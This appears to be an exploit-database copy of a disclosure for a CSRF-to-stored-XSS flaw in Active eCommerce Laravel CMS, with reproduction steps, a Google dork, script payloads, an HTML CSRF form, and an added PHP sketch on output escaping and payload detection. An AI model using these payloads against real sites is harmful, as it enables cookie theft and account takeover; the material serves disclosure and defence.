Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)

CVE: (none listed)
Category: CWE-352
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2022-07-20
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070059

Below is a copy:

Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Exploit Title: Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 25/11/2021
# Exploit Author: Keyvan Hardani
# Google Dork: intext:|| WHOPPS!!!THIS IS PIRATED COPY OF ACTIVE ECOMMERCE CMS
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: up to 6.1.2
# Tested on: Windows 10, Kali Linux, Burp Suite


Steps to Reproduce:

1. First, log in to the site as a customer.
2. Then click the navigation bar and open "Support Ticket".
3. Search for the token ( _token ) in the source code and copy the value.
4. Option 1: save the script as HTML, paste the _token into the token field and hit submit.
5. Option 2: use the XSS payload </textarea><script>alert(document.domain)</script> in the Description or Subject value of the support ticket.
6. Now generate a CSRF PoC.

More info & Video:
https://github.com/Keyvanhardani/Active-eCommerce-Laravel-CMS-5.5.2-Cross-Site-request-forgery-CSRF-to-Cross-site-Scripting-XSS 

Proof of Concept:

<!DOCTYPE html>
<html>
<body>
  <form action="https://site.com/ecommerce/support_ticket" method="POST">
    <input type="text" name="_token" value="gShF0bUHgMjfSmO7sqd5J5mSzvXJFnB0qeEmc6vD" placeholder="input the token and submit the form">
    <input type="hidden" name="subject" value="test<script>alert(document.cookie)</script>">
    <input type="hidden" name="details" value="test<script>alert(document.cookie)</script>">
    <input type="hidden" name="attachments" class="selected-files">
    <input type="submit" value="submit">
  </form>
</body>
</html>

DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.
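
Mitigation sketch, added here as an example and not taken from the advisory or from the vendor's code: the payload in step 5 only works if the stored ticket text is written into the page without HTML encoding. The helper names below are hypothetical, and the code assumes the details value is echoed inside a <textarea>, as the </textarea> prefix of that payload implies.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not Active eCommerce code) modelling a view that
// shows a ticket's "details" value inside a <textarea>.

// Unsafe: raw interpolation, what Blade's {!! $details !!} would produce.
function render_details_raw(string $details): string
{
    return '<textarea name="details">' . $details . '</textarea>';
}

// Safe: encode for HTML, as Blade's {{ $details }} does through e().
function render_details_escaped(string $details): string
{
    $encoded = htmlspecialchars($details, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="details">' . $encoded . '</textarea>';
}

// True when stored text can close the textarea or open a script element.
function has_live_markup(string $html_fragment): bool
{
    return preg_match('~</textarea\s*>|<script\b~i', $html_fragment) === 1;
}

// Payload string quoted in step 5 of the advisory.
$payload = '</textarea><script>alert(document.domain)</script>';

$raw  = render_details_raw($payload);
$safe = render_details_escaped($payload);

// Strip the wrapper we emitted ourselves and inspect only the stored part.
$inner = static fn(string $html): string =>
    substr($html, strlen('<textarea name="details">'), -strlen('</textarea>'));

printf("raw     live markup: %s\n", has_live_markup($inner($raw)) ? 'yes' : 'no');
printf("escaped live markup: %s\n", has_live_markup($inner($safe)) ? 'yes' : 'no');
echo $safe, "\n";
```

The same encoding has to be applied to the subject field and to every view that displays ticket text, including the one staff use to read tickets.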
